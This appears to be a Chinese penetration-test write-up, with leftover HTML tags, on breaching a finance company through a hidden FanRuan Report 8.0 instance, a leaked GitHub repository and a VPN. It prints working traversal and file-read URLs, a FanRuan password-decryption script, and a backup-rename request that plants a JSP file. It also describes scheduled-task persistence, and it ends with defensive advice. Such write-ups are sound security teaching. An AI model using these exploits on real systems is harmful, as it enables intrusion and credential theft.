渗透测试实战：从艰难打点到内网突破<\/h1>

项目背景<\/h2>

目标：一家互联网金融公司<\/li>
资产规模：100+个系统<\/li>

技术栈：

主要：Springboot<\/li>
次要：Node.js + Vue<\/li> <\/ul> <\/li>
防护措施：阿里云WAF<\/li>

特殊点：去年已进行过渗透测试，发现的漏洞均已修复<\/li> <\/ul>

渗透测试方法论<\/h2>

资产识别与分类<\/strong><\/p>

区分Springboot和Node.js系统<\/li>
重点关注去年未测试的资产<\/li> <\/ul> <\/li>

突破点选择<\/strong><\/p>

客服系统（Node.js+Vue开发）<\/li>
运行在444端口(https:\/\/www.test.com:444\/)<\/li>
功能点：文件上传（但上传至阿里云OSS）<\/li> <\/ul> <\/li> <\/ol>
关键突破点1：客服系统中的帆软报表系统<\/h2>
发现过程<\/h3>

观察细节<\/strong>：浏览器选项卡logo变化<\/p>

原logo → 帆软报表系统logo<\/li>
提示可能存在隐藏子系统<\/li> <\/ul> <\/li>

目录爆破<\/strong><\/p>

常规扫描未发现<\/li>
搭建本地帆软环境分析路径结构<\/li>
发现真实路径：https:\/\/www.test.com:444\/\/WebReport\/ReportServer<\/li> <\/ul> <\/li> <\/ol>
漏洞利用链<\/h3>

信息收集<\/strong><\/p>

版本确认：帆软8.0<\/li>
已知漏洞利用：

目录遍历：
\/WebReport\/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=..\/..&currentUserName=admin&currentUserId=1&isWebReport=true <\/code><\/pre> <\/li> 任意文件读取： \/WebReport\/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml <\/code><\/pre> <\/li> <\/ul> <\/li> <\/ul> <\/li> 密码解密<\/strong><\/p> 获取加密凭证<\/li> 使用解密脚本：<\/li> <\/ul> # -*- coding: utf-8 -*-<\/span> <\/span><\/span>cipher =<\/span> 'xxx'<\/span> <\/span><\/span>PASSWORD_MASK_ARRAY =<\/span> [19<\/span>, 78<\/span>, 10<\/span>, 15<\/span>, 100<\/span>, 213<\/span>, 43<\/span>, 23<\/span>] <\/span><\/span>Password =<\/span> ""<\/span> <\/span><\/span>cipher =<\/span> cipher[3<\/span>:] <\/span><\/span>for<\/span> i in<\/span> range(int(len(cipher) \/<\/span> 4<\/span>)): <\/span><\/span> c1 =<\/span> int("0x"<\/span> +<\/span> cipher[i*<\/span>4<\/span>:(i+<\/span>1<\/span>)*<\/span>4<\/span>], 16<\/span>) <\/span><\/span> c2 =<\/span> c1 ^<\/span> PASSWORD_MASK_ARRAY[i %<\/span> 8<\/span>] <\/span><\/span> Password =<\/span> Password +<\/span> chr(c2) <\/span><\/span>print (Password) <\/span><\/span><\/code><\/pre><\/li> 后台利用<\/strong><\/p> 成功登录后台<\/li> 插件上传漏洞利用：上传恶意插件<\/li> 文件移动利用（参考ADog文章）：<\/li> <\/ul> POST<\/span> \/WebReport\/ReportServer?op=fr_server&cmd=manual_backup HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> www.test.com:444<\/span> <\/span><\/span>Content-Length:<\/span> 106<\/span> <\/span><\/span>...(省略headers)...<\/span> <\/span><\/span>optype=edit_backup&oldname=..\/..\/plugins\/plugin-com.fr.plugin.external&newname=data.jsp&serverID= <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 绕过限制<\/strong><\/p> 发现直接访问WebReport目录下文件返回404<\/li> 替代方案：利用计划任务实现命令执行<\/li> 通过列目录找到计划任务目录<\/li> 替换现有计划任务实现持久化<\/li> <\/ul> <\/li> <\/ul> <\/li> <\/ol> 关键突破点2：GitHub源码泄露<\/h2> 信息发现<\/strong><\/p> 在系统文件中发现未登记的域名<\/li> GitHub搜索发现6年前的历史仓库<\/li> <\/ul> <\/li> 信息利用<\/strong><\/p> 分析配置文件发现泄露邮箱<\/li> 邮箱中获取VPN密码重置邮件<\/li> 通过VPN进入内网<\/li> <\/ul> <\/li> <\/ol> 技术要点总结<\/h2> 细致观察<\/strong><\/p> 浏览器logo变化等细微线索<\/li> 系统内隐藏的域名信息<\/li> <\/ul> <\/li> 针对性爆破<\/strong><\/p> 基于特定系统(帆软)的目录结构爆破<\/li> 本地环境搭建辅助分析<\/li> <\/ul> <\/li> 漏洞组合利用<\/strong><\/p> 信息泄露+密码解密+后台漏洞组合拳<\/li> 计划任务替代webshell实现命令执行<\/li> <\/ul> <\/li> 历史信息利用<\/strong><\/p> GitHub历史仓库挖掘<\/li> 配置文件中敏感信息利用<\/li> <\/ul> <\/li> <\/ol> 防御建议<\/h2> 隐藏系统信息<\/strong><\/p> 避免暴露框架\/系统标识<\/li> 统一系统logo展示<\/li> <\/ul> <\/li> 访问控制<\/strong><\/p> 严格限制目录访问权限<\/li> 实现URL访问白名单<\/li> <\/ul> <\/li> 敏感信息保护<\/strong><\/p> 配置文件加密处理<\/li> 定期清理历史代码仓库<\/li> <\/ul> <\/li> 漏洞修复<\/strong><\/p> 及时更新第三方组件<\/li> 禁用不必要的功能接口<\/li> <\/ul> <\/li> 监控措施<\/strong><\/p> 加强异常访问日志监控<\/li> 实施文件变更告警<\/li> <\/ul> <\/li> <\/ol>